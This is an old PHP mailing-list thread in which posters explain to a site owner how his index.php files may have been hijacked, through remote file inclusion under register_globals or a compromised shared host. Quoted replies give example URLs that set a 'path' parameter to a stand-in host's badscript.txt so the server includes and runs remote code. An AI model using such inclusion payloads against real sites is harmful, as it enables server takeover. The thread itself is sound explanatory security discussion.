(Top posting, as seems to be the trend in this thread) Tedd, It might be that you are hosting on a shared host, and that the attacker compromised another site on that host giving him access to your (and everyone else's) web root. If that is the case, your hosting provider needs to look into their file system security policies, and you need to re-evaluate your choice of providers. JM > > hi tedd... > > for the following url, > http://www.example.com/test.php?path=abc?dummy=123 > > if the register_globals is on, a malicious user could > potentially invoke, > http://www.example.com/badscript.php?path=http://www.badserver > .com/badscript > .txt?dummy=123, which would cause the 'badscript.txt' to be > used in the > original script. now, this in and of itself wouldn't cause a > file on the > http server to be changed. however, if the webapp somehow > caused the $path > var to be invoked or to be used in an exec() function, then > whatever is in > the 'badscript.txt' file will be run as if the file is on the > local system. > > at this point, you're pretty much at whim of the malicious > user. now, the > chance of this happening is pretty slim, unless you're using some open > source app that's unsecure, and that a user can reasonably > easy find. which > is what has happened to some apps in the past. > > a more potential reason for the index.php files to be > changed, is that there > was some security hole, either via apache, and/or the OS for > the server. > > hope this helps a little bit more... > > > > the http://www.example.com/badscript.php?could > > -----Original Message----- > From: tedd [mailto:tedd@xxxxxxxxxxxx] > Sent: Tuesday, November 14, 2006 11:46 AM > To: Chris Shiflett > Cc: PHP > Subject: Re: Fwd: Highjack? > > > At 1:39 PM -0500 11/14/06, Chris Shiflett wrote: > >tedd wrote: > >> > The script will then include > >> > http://www.badserver.com/badscript.txt?dummy=script.php > >> > >> I still don't see how "badscript.php" can be uploaded into > >> example.com's site in the first place > > > >PHP sends a request to badserver.com for badscript.txt, and > the content > >of the response is included just as if it were the content > of a local file. > > > >Hope that helps. > > > >Chris > > Chris; > > I'm still confused. > > >At 7:12 PM +0100 11/13/06, Rory Browne wrote: > > > >If register_globals is enabled, someone could > >http://www.example.com/badscript.php?path=http://www.badserve r.com/badscrip t.txt?dummy= If example.com is my domain, then how could evil-doer get access to my site to place "badscript.php" there? tedd -- ------- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php